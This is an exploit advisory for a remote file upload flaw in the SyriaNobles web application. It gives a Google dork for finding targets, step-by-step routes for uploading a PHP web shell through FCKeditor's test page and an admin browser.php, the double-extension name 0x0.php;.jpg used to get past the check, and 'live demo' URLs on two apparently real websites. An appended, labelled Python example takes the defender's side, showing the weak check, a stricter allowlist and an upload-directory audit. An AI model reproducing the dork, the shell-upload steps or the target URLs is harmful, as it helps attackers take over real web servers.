
SyriaNobles Remote File Upload Vulnerability

Author: Dr-AnGeL , Published: 22-05-2012
# Exploit Title: SyriaNobles Remote File Upload Vulnerability
# Date: 23/05/2012
# Author: Dr-AnGeL
# Home Page: Sec-1337.com So0N | Sec4ever.com | V4-Team.com | Exploi4arab.com
# Email: FQ9@HotmaiL.fr
# Category: webapps
# Security Risk: High
# Google dork: intext:"Powered by SyriaNobles.com, Internet Information Network"
# Tested on: Linux , Win 7 , win Xp
# Special Greet'z 2 XroGuE <3 | EvIL SheLL [R.I.P] | 4cHrf | xMjahd | Federal | X-Shadow | TheMMA | TurkisH-RuleZ | Dr.Kro0oz | Dr.5rab | Hmei7 | Web-Sniper | The Rock

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
Exploit :

[+] 1-Arbitrary File Upload Vulnerability:

p0c: Site/admin/FCKeditor/editor/filemanager/upload/test.html


Rename Your Shell To 0x0.php;.jpg And Upload It :)

You Will Find It In : Site/UserFiles/

[+] 2-Remote File Upload Into Live Browser :


p0c : Go To The Admin Area

Like : Site/admin/index.php

Change index.php to browser.php

Upload your Shell .php Or .php;.jpg

You Will Find It In This Directory : Site/userdir/


Live Demo :

http://istanbolico.com/Site/admin/FCKeditor/editor/filemanager/upload/test.html

http://istanbolico.com/Site/admin/browser.php

http://www.alrahwanji.com/admin/FCKeditor/editor/filemanager/upload/test.html

http://www.alrahwanji.com/admin/browser.php
==========================================================================



The End .
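
Added example (not part of the original advisory, and not SyriaNobles or FCKeditor code): a defender-side check in Python showing why a name such as 0x0.php;.jpg passes a last-extension test, a stricter allowlist that rejects it, and an audit of the UserFiles/ and userdir/ upload directories named above. The extension lists, function names and the sample directory tree are assumptions constructed for illustration.

```python
import os
import re
import tempfile

# Assumed policy for this example: only these image types are legitimate uploads.
ALLOWED_EXT = {"jpg", "jpeg", "png", "gif"}
# Assumed list of name segments that indicate server-side script content.
SCRIPT_EXT = {"php", "php3", "php4", "php5", "phtml", "phar", "asp", "aspx", "cgi", "pl"}

def last_extension_check(name):
    """The weak check: only the text after the final dot is inspected."""
    return name.rsplit(".", 1)[-1].lower() in ALLOWED_EXT

def strict_check(name):
    """Accept exactly one dot, a conservative character set, an allowlisted extension."""
    m = re.fullmatch(r"[A-Za-z0-9_-]{1,64}\.([A-Za-z0-9]{1,5})", name)
    return bool(m) and m.group(1).lower() in ALLOWED_EXT

def has_script_segment(name):
    """True if any '.'- or ';'-separated segment after the first is a script extension."""
    segments = re.split(r"[.;]", name.lower())[1:]
    return any(seg.strip() in SCRIPT_EXT for seg in segments)

def audit(root):
    """Walk an upload directory and return relative paths that need review."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for f in files:
            if has_script_segment(f) or not strict_check(f):
                hits.append(os.path.relpath(os.path.join(dirpath, f), root))
    return sorted(hits)

def demo():
    """Build a constructed upload tree (sample data, not from a real site) and audit it."""
    samples = ("UserFiles/photo.jpg", "UserFiles/0x0.php;.jpg",
               "userdir/logo.png", "userdir/x.php")
    with tempfile.TemporaryDirectory() as root:
        for rel in samples:
            path = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(path), exist_ok=True)
            open(path, "w").close()
        return audit(root)

if __name__ == "__main__":
    print(demo())
```

In a real upload handler the stored file name should be generated server-side rather than taken from the client, and the upload directories should be served without script execution enabled.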
